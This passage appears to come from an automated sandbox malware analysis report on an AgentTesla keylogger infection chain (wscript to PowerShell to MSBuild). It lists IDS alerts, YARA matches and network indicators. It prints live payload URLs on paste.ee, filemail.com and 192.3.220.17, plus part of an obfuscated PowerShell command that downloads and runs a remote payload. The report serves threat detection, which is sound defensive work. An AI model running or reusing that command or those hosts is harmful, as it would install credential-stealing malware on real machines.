                        Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 192.3.220.17:80 -> 192.168.2.4:49735
                        Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 192.3.220.17:80 -> 192.168.2.4:49735
                        Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 192.3.220.17:80 -> 192.168.2.4:49735
                        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.72:443 -> 192.168.2.4:49734
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 23.186.113.60 443Jump to behavior
                        Connects to a pastebin service (likely for C&C)
                        Source: unknownDNS query: name: paste.ee
                        Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=ESYTiTR3O03E5qrMnIyyWtYf5OMFU0makxMu0ePqRRJNicNjC36a8T2jGfWT6FEBj5s&pk_vid=342803d1cc4e3b80174066705080a5ef HTTP/1.1Host: 1007.filemail.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /base64444444444444444444444444444.txt HTTP/1.1Host: 192.3.220.17Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 23.186.113.60 23.186.113.60
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: unknownDNS query: name: ip-api.com
                        Source: global trafficHTTP traffic detected: GET /d/rrpcUbe1/0 HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: global trafficHTTP traffic detected: GET /d/rrpcUbe1/0 HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=ESYTiTR3O03E5qrMnIyyWtYf5OMFU0makxMu0ePqRRJNicNjC36a8T2jGfWT6FEBj5s&pk_vid=342803d1cc4e3b80174066705080a5ef HTTP/1.1Host: 1007.filemail.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /base64444444444444444444444444444.txt HTTP/1.1Host: 192.3.220.17Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: paste.ee
                        Source: global trafficDNS traffic detected: DNS query: 1007.filemail.com
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: tse1.mm.bing.net
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.17
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.17/base64444444444444444444444444444.txt
                        Source: MSBuild.exe, 00000008.00000002.2936900255.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2936900255.0000000002AC5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2936900255.0000000002AAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: powershell.exe, 00000005.00000002.1853721064.0000000005D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2936900255.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2936900255.0000000002AAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: powershell.exe, 00000005.00000002.1853721064.000000000599B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004931000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2936900255.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2936900255.0000000002AAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1007.filemail.com
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1007.filemail.com/api/file/get?filekey=ESYTiTR3O03E5qrMnIyyWtYf5OMFU0makxMu0ePqRRJNicNjC36a8
                        Source: powershell.exe, 00000005.00000002.1853721064.0000000005D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBkq
                        Source: wscript.exe, 00000003.00000003.1739105346.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739589814.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                        Source: wscript.exe, 00000003.00000003.1739105346.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739589814.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                        Source: wscript.exe, 00000003.00000003.1739105346.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739589814.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                        Source: wscript.exe, 00000003.00000003.1739853725.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                        Source: powershell.exe, 00000005.00000002.1853721064.000000000599B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000005.00000002.1853721064.000000000599B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000005.00000002.1853721064.000000000599B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: wscript.exe, 00000003.00000003.1739853725.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                        Source: wscript.exe, 00000003.00000003.1739853725.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
                        Source: wscript.exe, 00000003.00000003.1739537955.0000000005CE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729587301.0000000005E23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1737440948.0000000005C2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729945522.0000000005E37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1744752845.0000000005C1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1730057843.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729587301.0000000005E37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729993367.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1737440948.0000000005C62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1744856736.0000000005C5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738271465.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1744856736.0000000005C62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729776106.0000000005E34000.00000004.00000020.00020000.00000000.sdmp, 0[1].txt.3.drString found in binary or memory: https://github.com/koswald/VBScript
                        Source: wscript.exe, 00000003.00000003.1738271465.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, 0[1].txt.3.drString found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
                        Source: wscript.exe, 00000003.00000003.1739537955.0000000005CE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1737440948.0000000005C2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729945522.0000000005E37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1744752845.0000000005C1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1730057843.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729587301.0000000005E37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729993367.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738271465.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, 0[1].txt.3.drString found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
                        Source: wscript.exe, 00000003.00000003.1729945522.0000000005E37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1730057843.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729587301.0000000005E37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729993367.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738271465.0000000005E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/koswald/VBScriptp_
                        Source: wscript.exe, 00000003.00000002.1743609926.0000000002B37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738450202.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                        Source: powershell.exe, 00000005.00000002.1853721064.000000000599B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: wscript.exe, 00000003.00000002.1743609926.0000000002B37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738450202.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
                        Source: wscript.exe, 00000003.00000002.1743172680.0000000002A50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1744856736.0000000005C62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738691504.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, morninghtaaaafilex.hta, octupole.vbs.1.dr, misdivide.bat.0.drString found in binary or memory: https://paste.ee/d/rrpcUbe1/0
                        Source: wscript.exe, 00000003.00000002.1743609926.0000000002B37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738450202.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/rrpcUbe1/0$
                        Source: wscript.exe, 00000003.00000003.1742599910.0000000002A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743304735.0000000002A97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/rrpcUbe1/0?
                        Source: wscript.exe, 00000003.00000002.1743609926.0000000002B37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738450202.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/rrpcUbe1/0B
                        Source: wscript.exe, 00000003.00000002.1743172680.0000000002A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/rrpcUbe1/88
                        Source: wscript.exe, 00000003.00000003.1739105346.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739589814.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                        Source: wscript.exe, 00000003.00000003.1739853725.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                        Source: wscript.exe, 00000003.00000003.1739105346.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739589814.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                        Source: wscript.exe, 00000003.00000003.1739853725.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                        Source: wscript.exe, 00000003.00000003.1739105346.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739589814.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                        Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.4:49733 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 142.215.209.72:443 -> 192.168.2.4:49734 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49831 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49832 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49833 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49841 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49841 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Contains functionality to log keystrokes (.Net Source)
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, xljC6U.cs.Net Code: YPw7g

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 5.2.powershell.exe.5e0e358.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 5.2.powershell.exe.5e0e358.7.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                        Wscript starts Powershell (via cmd or directly)
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#H